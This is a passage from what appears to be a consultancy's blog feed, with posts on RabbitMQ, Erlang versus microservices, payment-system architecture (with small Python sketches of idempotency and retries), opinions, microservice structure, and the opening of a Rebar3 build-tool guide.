&lt;li&gt;&lt;strong&gt;RabbitMQ is reliable&lt;/strong&gt;-if used correctly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;RabbitMQ vs. Kafka vs. MQTT&lt;/strong&gt; depends on &lt;strong&gt;use case and scale&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Message Queues ≠ Event-Driven Systems&lt;/strong&gt;, but they can complement each other.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;You can use a database&lt;/strong&gt;, but it’s often &lt;strong&gt;not the best tool for the job&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you&#39;ve been burned by RabbitMQ, the issue was likely &lt;strong&gt;misconfiguration, not fundamental flaws&lt;/strong&gt;. Understanding its strengths and using it appropriately will lead to a &lt;strong&gt;robust and reliable messaging system&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;For a deeper look at the sync-vs-async distinction that underlies all of these tools, see &lt;a href=&quot;https://happihacking.com/blog/posts/2025/asynchp/&quot;&gt;Synchronous vs. Asynchronous: Clearing the Confusion&lt;/a&gt;. For a real-world case study where RabbitMQ caused production issues and how we resolved them, see &lt;a href=&quot;https://happihacking.com/blog/posts/2023/delta/&quot;&gt;Unleashing the Power of Erlang&#39;s BEAM: A Case Study with Delta Exchange&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy messaging!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Forget Microservices: Just Use Erlang.</title>
    <link href="https://happihacking.com/blog/posts/2025/the_monolith/"/>
    <updated>2025-02-21T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/the_monolith/</id>
    <summary>A distributed system, without the distributed headaches.</summary>
    <content type="html">&lt;h1 id=&quot;forget-microservices-just-use-erlang&quot; tabindex=&quot;-1&quot;&gt;Forget Microservices: Just Use Erlang.&lt;/h1&gt;
&lt;p&gt;Once upon a time, software engineers decided that monoliths were bad.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;Monoliths don’t scale,&amp;quot; they said.
&amp;quot;Microservices give you flexibility,&amp;quot; they said.
&amp;quot;Just break it up into small services!&amp;quot; they said.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And then they spent the next two years debugging network partitions, timeouts, and retries, while their monolithic colleagues… just kept shipping features.&lt;/p&gt;
&lt;p&gt;But hey, at least their architecture diagrams look nice.&lt;/p&gt;
&lt;h2 id=&quot;the-myth-of-the-monolith&quot; tabindex=&quot;-1&quot;&gt;The Myth of the Monolith&lt;/h2&gt;
&lt;p&gt;A monolith, according to microservices evangelists, is a big, scary thing that will eventually crush your hopes, dreams, and deploy pipeline.&lt;/p&gt;
&lt;p&gt;The solution? Take your nice, self-contained system and distribute it across twelve different languages, five different message queues, and an unmaintainable web of HTTP calls.&lt;/p&gt;
&lt;p&gt;Of course, now every request has a 1% chance of failing mysteriously, but that’s resilience engineering, not a bug.&lt;/p&gt;
&lt;h2 id=&quot;a-distributed-system-without-the-distributed-headaches&quot; tabindex=&quot;-1&quot;&gt;A distributed system, without the distributed headaches.&lt;/h2&gt;
&lt;p&gt;Here’s the thing: if you write your system in Erlang, you don’t actually have a monolith. Instead, you get lightweight processes rather than OS threads-essentially microservices without the YAML. You get message passing instead of API calls, allowing for asynchronous execution without the added risk of network failures. And you get supervision trees that replace the need for a dedicated chaos engineering team, because your system automatically recovers from failures. In short, Erlang provides all the benefits of microservices without the latency, operational complexity, or existential angst.&lt;/p&gt;
&lt;p&gt;In other words: You already built an Erlang system-you just made it 10x slower and called it “modern architecture.”&lt;/p&gt;
&lt;p&gt;Congratulations:
&lt;a href=&quot;https://vereis.com/posts/you_built_an_erlang&quot;&gt;You have built an Erlang&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;virdings-first-rule-of-programming&quot; tabindex=&quot;-1&quot;&gt;Virding’s First Rule of Programming&lt;/h2&gt;
&lt;p&gt;There’s an old saying:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“Any sufficiently complicated concurrent program in another language contains an ad hoc, informally-specified, bug-ridden implementation of half of Erlang.”
-- Robert Virding&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Which of course is a paraphrasing of &lt;a href=&quot;https://en.wikipedia.org/wiki/Greenspun&#39;s_tenth_rule&quot;&gt;Greenspun&#39;s tenth rule&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;And yet, here we are.&lt;/p&gt;
&lt;p&gt;People reinvent Erlang every day, usually by:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Wrapping HTTP in gRPC.&lt;/li&gt;
&lt;li&gt;Implementing retries with exponential backoff.&lt;/li&gt;
&lt;li&gt;Logging everything, because nobody actually knows how their system works anymore.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;so-should-you-build-a-monolith&quot; tabindex=&quot;-1&quot;&gt;So, Should You Build a Monolith?&lt;/h2&gt;
&lt;p&gt;Yes. But in Erlang. Because then, it isn’t a monolith.&lt;/p&gt;
&lt;p&gt;It’s a highly efficient, self-healing, distributed system-without the part where you spend your weekends fixing Kubernetes networking issues.&lt;/p&gt;
&lt;p&gt;And if you still really want microservices?&lt;/p&gt;
&lt;p&gt;Congratulations, you already have them.&lt;/p&gt;
&lt;p&gt;They&#39;re just called OTP Applications, and they don&#39;t require four extra DevOps engineers to keep running.&lt;/p&gt;
&lt;p&gt;For a more detailed look at what goes wrong when microservices lack structure, see &lt;a href=&quot;https://happihacking.com/blog/posts/2025/microsevices/&quot;&gt;Microservices Are NOT an Excuse for Chaos&lt;/a&gt;. For a practical discussion of how Erlang handles high-volume workloads in production, see &lt;a href=&quot;https://happihacking.com/blog/posts/2024/erlang_for_fintech/&quot;&gt;How Erlang Powers High-Volume Finance&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Before you break your system into 100 microservices, ask yourself:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Do you need microservices, or do you just need Erlang?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Because if you don’t, you’re probably just reimplementing it-badly.&lt;/p&gt;
&lt;p&gt;And deep down, you already knew that.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The Hidden Cost of Bad Payment Architecture</title>
    <link href="https://happihacking.com/blog/the-hidden-cost-of-bad-payment-architecture/"/>
    <updated>2025-02-20T00:00:00Z</updated>
    <id>https://happihacking.com/blog/the-hidden-cost-of-bad-payment-architecture/</id>
    <summary>Because &#39;It Works&#39; Is Not the Same as &#39;It Works Well&#39;</summary>
    <content type="html">&lt;h1 id=&quot;the-hidden-cost-of-bad-payment-architecture&quot; tabindex=&quot;-1&quot;&gt;The Hidden Cost of Bad Payment Architecture&lt;/h1&gt;
&lt;p&gt;If you&#39;ve ever tried to fix a broken payment system, you know it&#39;s never just one thing. It&#39;s a mess of poor decisions, technical debt, and wishful thinking piled into an unscalable, unreliable, and costly beast. And yet, many companies only start caring about payment architecture when customers start screaming-or worse, silently leaving.&lt;/p&gt;
&lt;h2 id=&quot;buy-now-panic-later-the-bnpl-of-bad-payment-systems&quot; tabindex=&quot;-1&quot;&gt;Buy Now, Panic Later: The BNPL of Bad Payment Systems&lt;/h2&gt;
&lt;p&gt;Most payment systems start as a simple need: &amp;quot;We need to process payments.&amp;quot; So someone wires up an API to Stripe, PayPal, or Adyen, writes some logic around it, and calls it a day. It works. Until it doesn’t. Over time, the system accrues patches, exceptions, and workarounds. A second payment provider is added. Then a third. Some customers require invoicing, others want subscriptions, and international payments bring in new compliance requirements. Soon, the once-simple system is a labyrinth of unmaintainable complexity. By the time a company realizes the cost, it&#39;s too late. Payments aren’t just a feature-they are the foundation of revenue. And if that foundation is brittle, everything built on top of it is at risk.&lt;/p&gt;
&lt;h2 id=&quot;transaction-declined-the-true-cost-of-bad-payment-architecture&quot; tabindex=&quot;-1&quot;&gt;Transaction Declined: The True Cost of Bad Payment Architecture&lt;/h2&gt;
&lt;p&gt;Bad payment architecture introduces failures at multiple points. High rejection rates arise due to insufficient retry logic, missing metadata, or poor handling of 3D Secure (3DS) challenges. Silent failures occur in edge cases where a transaction &amp;quot;succeeds&amp;quot; on the frontend but never gets recorded. Concurrency issues lead to double charges or duplicate refunds due to race conditions. When payments fail, customers don’t blame the system-they blame the company. And some won’t come back.&lt;/p&gt;
&lt;h2 id=&quot;the-late-fee-of-bad-design-operational-overhead&quot; tabindex=&quot;-1&quot;&gt;The Late Fee of Bad Design: Operational Overhead&lt;/h2&gt;
&lt;p&gt;A fragile payment system means constant firefighting. Finance teams have to manually reconcile transactions across multiple providers. Customer support becomes overloaded with users asking why their payments failed. Development teams waste time building custom fixes for every provider, each requiring its own logic, retry mechanisms, and integrations. Every hour spent fixing payment issues is an hour not spent improving the business.&lt;/p&gt;
&lt;h2 id=&quot;compliance-more-like-complication-fees&quot; tabindex=&quot;-1&quot;&gt;Compliance? More Like Complication Fees&lt;/h2&gt;
&lt;p&gt;Payments are subject to strict regulations such as PSD2, PCI-DSS, AML, and local tax laws. Poor architecture increases the risk of non-compliance, leading to incorrect card data storage, mishandled refunds and chargebacks, and failures to comply with Strong Customer Authentication (SCA), resulting in unnecessary declines. Regulatory non-compliance can result in hefty fines that far exceed the cost of building a better system upfront.&lt;/p&gt;
&lt;h2 id=&quot;scaling-more-like-failing&quot; tabindex=&quot;-1&quot;&gt;Scaling? More Like Failing&lt;/h2&gt;
&lt;p&gt;A payment system designed for a small number of transactions per month won’t survive at scale. Symptoms of bad scaling include database contention causing slow transactions, lack of idempotency leading to duplicate charges and refund loops, and an inflexible provider setup where a single outage halts all payments. As the business grows, every new customer isn’t just revenue-it’s additional strain on an already fragile system.&lt;/p&gt;
&lt;h2 id=&quot;fix-now-profit-later-the-bnpl-of-smart-architecture&quot; tabindex=&quot;-1&quot;&gt;Fix Now, Profit Later: The BNPL of Smart Architecture&lt;/h2&gt;
&lt;p&gt;Fixing the mess requires decoupling payment logic from business logic. Payments should be treated as an isolated service rather than tightly coupled logic spread across multiple modules. A well-designed architecture uses an event-driven model where a &amp;quot;payment_succeeded&amp;quot; event triggers order fulfillment, supports multiple providers without rewiring core business processes, and stores transaction states robustly to allow for retries and audits.&lt;/p&gt;
&lt;p&gt;Idempotency is non-negotiable (I cover this in more depth in &lt;a href=&quot;https://happihacking.com/blog/posts/2025/exacly_once/&quot;&gt;Why &amp;quot;Exactly Once&amp;quot; in Payments Is a Myth&lt;/a&gt;). Every transaction should be designed to be safely retried without causing duplicate charges. This means using unique transaction IDs for every operation, ensuring refunds and chargebacks don’t trigger unintended side effects, and implementing distributed locks or transactional guarantees where needed.&lt;/p&gt;
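&lt;p&gt;A minimal sketch of the idea, with an in-memory dictionary standing in for a real datastore and a stub where the provider call would go:&lt;/p&gt;

```python
# Toy idempotency store: a retry with the same key never charges twice.
processed = {}   # idempotency_key -> result of the first successful attempt

def charge(idempotency_key, amount_cents):
    if idempotency_key in processed:
        return processed[idempotency_key]   # replay: return the cached result
    # ...call the payment provider here; record the result atomically...
    result = {"status": "charged", "amount": amount_cents}
    processed[idempotency_key] = result
    return result

first = charge("order-42-attempt-1", 1999)
retry = charge("order-42-attempt-1", 1999)  # network timeout? client retried
assert first is retry                        # one charge, not two
```

&lt;p&gt;In production the store must be durable and the check-then-insert must be atomic (a unique constraint on the key works), but the contract is exactly this small.&lt;/p&gt;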
&lt;p&gt;No system is perfect, but good ones fail gracefully. Implementing automatic retries with exponential backoff, logging failures properly so debugging is possible, and proactively notifying customers when something goes wrong instead of waiting for them to complain are essential measures.&lt;/p&gt;
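&lt;p&gt;The retry-with-backoff part can be sketched like this (illustrative; the delays, attempt counts, and jitter range are arbitrary choices):&lt;/p&gt;

```python
import random
import time

def with_backoff(operation, max_attempts=5, base_delay=0.5):
    """Retry a flaky operation with exponential backoff and jitter."""
    for attempt in range(max_attempts):
        try:
            return operation()
        except Exception:
            if attempt == max_attempts - 1:
                raise   # out of attempts: fail loudly so it gets logged
            delay = base_delay * (2 ** attempt) + random.uniform(0, 0.1)
            time.sleep(delay)

# Demo: a call that succeeds on the third try.
calls = {"n": 0}
def flaky_capture():
    calls["n"] += 1
    if calls["n"] != 3:
        raise TimeoutError("provider unavailable")
    return "captured"

print(with_backoff(flaky_capture, base_delay=0.01))  # 'captured'
```

&lt;p&gt;The jitter matters: without it, a fleet of clients that failed together will retry together and hammer the provider in synchronized waves.&lt;/p&gt;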
&lt;p&gt;Rather than embedding provider-specific code deep in the application, an abstraction layer should be used. This allows swapping payment providers without major rewrites, normalizes errors and response formats across gateways, and supports smart routing by sending high-risk transactions to providers with better fraud protection.&lt;/p&gt;
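&lt;p&gt;One sketch of such a layer, with made-up stand-ins for the provider SDKs and a toy error map (real providers have far richer error taxonomies):&lt;/p&gt;

```python
# Hypothetical abstraction layer: provider-specific errors normalized to one shape.
class PaymentError(Exception):
    def __init__(self, code, provider):
        super().__init__(code)
        self.code = code
        self.provider = provider

class StripeLikeProvider:   # illustrative stand-in, not the real SDK
    name = "stripe"
    def charge(self, amount_cents):
        raise RuntimeError("card_declined")

class AdyenLikeProvider:    # also a stand-in
    name = "adyen"
    def charge(self, amount_cents):
        raise RuntimeError("Refused")

class PaymentGateway:
    """Business code talks to this; swapping providers touches nothing else."""
    CODE_MAP = {"card_declined": "declined", "Refused": "declined"}

    def __init__(self, provider):
        self.provider = provider

    def charge(self, amount_cents):
        try:
            return self.provider.charge(amount_cents)
        except RuntimeError as err:
            code = self.CODE_MAP.get(str(err), "unknown")
            raise PaymentError(code, self.provider.name)

for provider in (StripeLikeProvider(), AdyenLikeProvider()):
    try:
        PaymentGateway(provider).charge(1999)
    except PaymentError as err:
        print(provider.name, "-", err.code)   # both normalize to 'declined'
```

&lt;p&gt;Once errors are normalized, smart routing becomes a one-line decision in the gateway rather than a rewrite of every call site.&lt;/p&gt;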
&lt;p&gt;Bad payment architecture is an invisible tax on every transaction, every support ticket, and every regulatory fine. Companies that invest in robust, scalable, and failure-tolerant payment systems don’t just improve reliability-they increase revenue, reduce costs, and future-proof their business. If your payment system is already showing cracks, the best time to fix it was yesterday. The second-best time is now.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Opinions: Just the Facts, 11 Years Later</title>
    <link href="https://happihacking.com/blog/posts/2025/opinions/"/>
    <updated>2025-02-19T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/opinions/</id>
    <summary>Still no opinions. Mostly.</summary>
    <content type="html">&lt;h1 id=&quot;opinions-just-the-facts-11-years-later&quot; tabindex=&quot;-1&quot;&gt;Opinions: Just the Facts, 11 Years Later&lt;/h1&gt;
&lt;p&gt;A decade ago, I wrote a &lt;a href=&quot;https://stenmans.org/happi_blog/?p=238&quot;&gt;blog post&lt;/a&gt; declaring my distaste for opinions. I preferred facts. I had only three opinions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I don’t like opinions.&lt;/li&gt;
&lt;li&gt;XSLT is a terrible programming language.&lt;/li&gt;
&lt;li&gt;Redefinable syntax like operator overloading and macros is evil.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;That post still holds up fairly well, but let’s revisit it with 11 years of hindsight. Have I softened? Have I embraced the messy subjectivity of the human condition? No. But I have refined my stance.&lt;/p&gt;
&lt;h2 id=&quot;the-problem-with-opinions&quot; tabindex=&quot;-1&quot;&gt;The Problem with Opinions&lt;/h2&gt;
&lt;p&gt;One of the things I originally hated about opinions was the expectation that everyone must have one on every topic. This still frustrates me. Not everything requires my input.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“What do you think of the new MacBook?” - It runs software. That’s its job.&lt;/li&gt;
&lt;li&gt;“What’s your take on [current geopolitical crisis]?” - I’m not a historian. My uninformed opinion is irrelevant.&lt;/li&gt;
&lt;li&gt;“Do you like this blouse?” - It’s red. You look fine. But you’d look fine in any color.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I still reject the idea that opinions should be formed without knowledge, and I still prefer to engage in conversations where &lt;strong&gt;evidence and reasoning&lt;/strong&gt; drive conclusions.&lt;/p&gt;
&lt;h2 id=&quot;but-some-opinions-are-useful&quot; tabindex=&quot;-1&quot;&gt;But… Some Opinions Are Useful&lt;/h2&gt;
&lt;p&gt;In 11 years, I’ve realized that some opinions are not just tolerable but &lt;strong&gt;necessary&lt;/strong&gt;. In particular:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Opinions as decision accelerators.&lt;/strong&gt; Sometimes, an opinion isn’t about being objectively correct-it’s about moving forward. If every architectural decision required unanimous factual consensus, nothing would ever ship.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Opinions as heuristics.&lt;/strong&gt; We can’t test everything ourselves. Some opinions are shortcuts based on &lt;strong&gt;pattern recognition and experience&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Opinions as cultural markers.&lt;/strong&gt; They define &lt;strong&gt;what matters in a team, a company, a language community.&lt;/strong&gt; “We value explicit over implicit” is an opinion, and that’s okay.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;the-facts-still-win&quot; tabindex=&quot;-1&quot;&gt;The Facts Still Win&lt;/h2&gt;
&lt;p&gt;But at the end of the day, opinions are &lt;strong&gt;not a substitute for facts&lt;/strong&gt;. We should challenge them, update them, and discard them when they no longer serve us. If an opinion can’t withstand scrutiny, it was never worth having in the first place.&lt;/p&gt;
&lt;p&gt;And yes, I still think XSLT is a terrible programming language, and that redefinable syntax is evil. Some opinions stand the test of time.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Microservices Are NOT an Excuse for Chaos</title>
    <link href="https://happihacking.com/blog/posts/2025/microsevices/"/>
    <updated>2025-02-18T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/microsevices/</id>
    <summary>How Overcomplicating Your Architecture Can Destroy Scalability Instead of Enabling It</summary>
    <content type="html">&lt;h1 id=&quot;microservices-are-not-an-excuse-for-chaos&quot; tabindex=&quot;-1&quot;&gt;Microservices Are NOT an Excuse for Chaos&lt;/h1&gt;
&lt;p&gt;Too many teams think &amp;quot;microservices&amp;quot; means &amp;quot;no rules.&amp;quot; The result? A distributed spaghetti mess-harder to debug, more expensive to operate, and a nightmare to scale.&lt;/p&gt;
&lt;p&gt;The promise of microservices is &lt;strong&gt;autonomy, scalability, and resilience.&lt;/strong&gt; But in practice, microservices can lead to &lt;strong&gt;data silos, inconsistent APIs, and operational nightmares&lt;/strong&gt; if not handled correctly.&lt;/p&gt;
&lt;h2 id=&quot;the-problem-unstructured-microservices-lead-to-complexity&quot; tabindex=&quot;-1&quot;&gt;The Problem: Unstructured Microservices Lead to Complexity&lt;/h2&gt;
&lt;p&gt;Teams often dive into microservices without understanding the trade-offs. Without structure, they introduce &lt;strong&gt;more problems than they solve:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;No clear data ownership&lt;/strong&gt; → Services fight over shared databases, causing unpredictable failures.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Inconsistent messaging patterns&lt;/strong&gt; → Some teams use REST, others gRPC, others RabbitMQ, with no unifying strategy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lack of observability&lt;/strong&gt; → Debugging across multiple services becomes an exercise in blind guessing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Service sprawl&lt;/strong&gt; → Every minor function becomes a separate service, leading to unnecessary overhead.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A poorly structured microservices architecture can be &lt;strong&gt;worse than a monolith&lt;/strong&gt; because it distributes complexity &lt;strong&gt;without a clear control mechanism.&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&quot;the-solution-structure-before-scale&quot; tabindex=&quot;-1&quot;&gt;The Solution: Structure Before Scale&lt;/h2&gt;
&lt;p&gt;Microservices work &lt;strong&gt;only when the fundamentals are in place:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Data Has Clear Owners&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Each service must own &lt;strong&gt;its own data.&lt;/strong&gt; Shared databases across services create &lt;strong&gt;hidden coupling&lt;/strong&gt; and make failure isolation impossible.&lt;/li&gt;
&lt;li&gt;Follow &lt;strong&gt;Domain-Driven Design (DDD)&lt;/strong&gt; to ensure that data boundaries match business logic.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;✅ &lt;strong&gt;Consistent Communication Patterns&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Define &lt;strong&gt;when to use APIs, event-driven messaging, or direct service-to-service calls.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;API contracts must be &lt;strong&gt;strictly defined and versioned&lt;/strong&gt; to prevent breaking changes.&lt;/li&gt;
&lt;li&gt;Event-driven architectures work-but only when &lt;strong&gt;events are properly modeled and handled.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;✅ &lt;strong&gt;Observability is Built-In&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Logs, metrics, and traces should be &lt;strong&gt;first-class citizens&lt;/strong&gt; in your architecture.&lt;/li&gt;
&lt;li&gt;Use &lt;strong&gt;OpenTelemetry, distributed tracing, and structured logging&lt;/strong&gt; to track service interactions.&lt;/li&gt;
&lt;li&gt;If you can’t trace a request &lt;strong&gt;across multiple services,&lt;/strong&gt; your system is already broken.&lt;/li&gt;
&lt;/ul&gt;
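&lt;p&gt;The core of distributed tracing is just disciplined propagation of an identifier. A toy sketch with structured JSON logs and hypothetical service names-a real system would use OpenTelemetry rather than hand-rolling this:&lt;/p&gt;

```python
import json
import uuid

# Toy structured-log sketch: one correlation id follows a request across services.
LOG = []

def log(service, event, correlation_id):
    LOG.append(json.dumps(
        {"service": service, "event": event, "correlation_id": correlation_id}
    ))

def checkout_service(order):
    correlation_id = str(uuid.uuid4())   # minted at the edge, then passed along
    log("checkout", "order_received", correlation_id)
    payment_service(order, correlation_id)
    return correlation_id

def payment_service(order, correlation_id):
    log("payment", "charge_attempted", correlation_id)

cid = checkout_service({"id": 42})
trace = [json.loads(line) for line in LOG
         if json.loads(line)["correlation_id"] == cid]
print([entry["service"] for entry in trace])   # ['checkout', 'payment']
```

&lt;p&gt;If any hop drops the id, the trace goes dark from that point on-which is exactly the &amp;quot;blind guessing&amp;quot; failure mode described above.&lt;/p&gt;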
&lt;h2 id=&quot;the-hard-truth-microservices-arent-always-the-right-choice&quot; tabindex=&quot;-1&quot;&gt;The Hard Truth: Microservices Aren’t Always the Right Choice&lt;/h2&gt;
&lt;p&gt;If your team lacks &lt;strong&gt;operational maturity, well-defined domain boundaries, or clear integration strategies,&lt;/strong&gt; microservices will &lt;strong&gt;slow you down rather than speed you up.&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If your services &lt;strong&gt;still need to communicate frequently&lt;/strong&gt;, they aren’t microservices-they’re a &lt;strong&gt;distributed monolith&lt;/strong&gt; with extra network latency.&lt;/li&gt;
&lt;li&gt;If your deployment pipelines &lt;strong&gt;aren’t automated&lt;/strong&gt;, microservices will &lt;strong&gt;increase complexity, not reduce it.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;If your organization &lt;strong&gt;doesn’t have strong architectural discipline&lt;/strong&gt;, microservices will lead to fragmentation rather than agility.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;conclusion-build-microservices-with-purpose&quot; tabindex=&quot;-1&quot;&gt;Conclusion: Build Microservices With Purpose&lt;/h2&gt;
&lt;p&gt;Microservices aren’t an excuse to abandon structure. Done right, they provide &lt;strong&gt;fault isolation, independent scaling, and faster deployments.&lt;/strong&gt; Done wrong, they create &lt;strong&gt;distributed chaos.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Before breaking your monolith into microservices, ask yourself:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Do you have clear data ownership?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Are your communication patterns consistent?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Can you trace requests across the entire system?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If not, fix those first. Otherwise, you&#39;re just replacing &lt;strong&gt;a bad monolith with an even worse distributed system.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For a contrarian take on the monolith-vs-microservices debate, see &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the_monolith/&quot;&gt;Forget Microservices: Just Use Erlang&lt;/a&gt;. For guidance on structuring concurrent systems by domains and clear process responsibilities, see &lt;a href=&quot;https://happihacking.com/blog/posts/2024/designing_concurrency/&quot;&gt;Designing Concurrent Systems on the BEAM&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Getting the hang of Rebar3</title>
    <link href="https://happihacking.com/blog/posts/2025/rebar/"/>
    <updated>2025-01-07T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/rebar/</id>
    <content type="html">&lt;p&gt;&lt;a href=&quot;https://rebar3.org/&quot;&gt;Rebar3&lt;/a&gt; is the standard build tool and package
manager for the Erlang programming language. While the &lt;a href=&quot;https://rebar3.org/docs/&quot;&gt;official
documentation&lt;/a&gt; is pretty good, it can be hard for
a beginner to grasp what Rebar3 is really doing at times, and why; in
particular how profiles, releases, and dependencies work, where the build
results end up, and so on.&lt;/p&gt;
&lt;p&gt;This guide assumes you already have &lt;a href=&quot;https://rebar3.org/docs/getting-started/&quot;&gt;installed Erlang and
Rebar&lt;/a&gt; and you understand the
basics of Erlang/OTP &lt;a href=&quot;https://adoptingerlang.org/docs/development/otp_applications/&quot;&gt;applications and their directory
structure&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;running&quot; tabindex=&quot;-1&quot;&gt;Running&lt;/h2&gt;
&lt;p&gt;Like most typical build tools, basic usage is just &lt;code&gt;rebar3 &amp;lt;command&amp;gt;&lt;/code&gt;, with
commands for instantiating a new project, compiling, running tests,
building a release package, etc.&lt;/p&gt;
&lt;p&gt;Common commands are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;rebar3 help&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 new&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 compile&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 shell&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 release&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 eunit&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rebar3 ct&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For the beginner, note that simply running &lt;code&gt;erl&lt;/code&gt; to launch Erlang will get
you an interactive Erlang shell but will not add your application to the
code path, unless you do so yourself with a flag like &lt;code&gt;-pa &amp;lt;ebin-dir&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Instead, use &lt;code&gt;rebar3 shell&lt;/code&gt; and Rebar3 will launch an Erlang shell with the
code path set up for you. This will also launch your Erlang applications in
the background according to your configuration, so that you can start
interacting with them (mainly for debugging). If you want to get a shell
without launching anything, use &lt;code&gt;rebar3 shell --start-clean&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For details on all the commands, see the &lt;a href=&quot;https://rebar3.org/docs/commands/&quot;&gt;official
documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;configuration&quot; tabindex=&quot;-1&quot;&gt;Configuration&lt;/h2&gt;
&lt;p&gt;Rebar3 reads the &lt;code&gt;rebar.config&lt;/code&gt; file to know what to do. This consists of
one or more plain Erlang tuples: &lt;code&gt;{...}&lt;/code&gt;, each terminated by a full stop
and newline, for example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{erl_opts, [debug_info]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These may contain numbers, double-quoted strings &lt;code&gt;&amp;quot;...&amp;quot;&lt;/code&gt;, symbols (&amp;quot;atoms&amp;quot;)
such as &lt;code&gt;erl_opts&lt;/code&gt;, lists &lt;code&gt;[...]&lt;/code&gt;, and other nested tuples.&lt;/p&gt;
&lt;p&gt;Apart from compilation options and other details, the &lt;code&gt;deps&lt;/code&gt; section of
this file lists dependencies (other Erlang apps which will be fetched
automatically):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{deps, [{getopt, &amp;quot;1.0.2&amp;quot;},
        {cowboy, {git, &amp;quot;https://github.com/ninenines/cowboy.git&amp;quot;,
                 {tag, &amp;quot;2.11.0&amp;quot;}}},
        ... ]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;relx&lt;/code&gt; section defines how a Release (the package that you ship) is put
together:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{relx, [{release, { my_release, &amp;quot;1.0.2&amp;quot;},
         [my_app1, my_app2]},
        {include_erts, true},
        ... ]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;profiles&lt;/code&gt; section specifies the different Rebar3 Profiles:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{profiles, [{prod, [... prod-specific-options ...
                   ]},
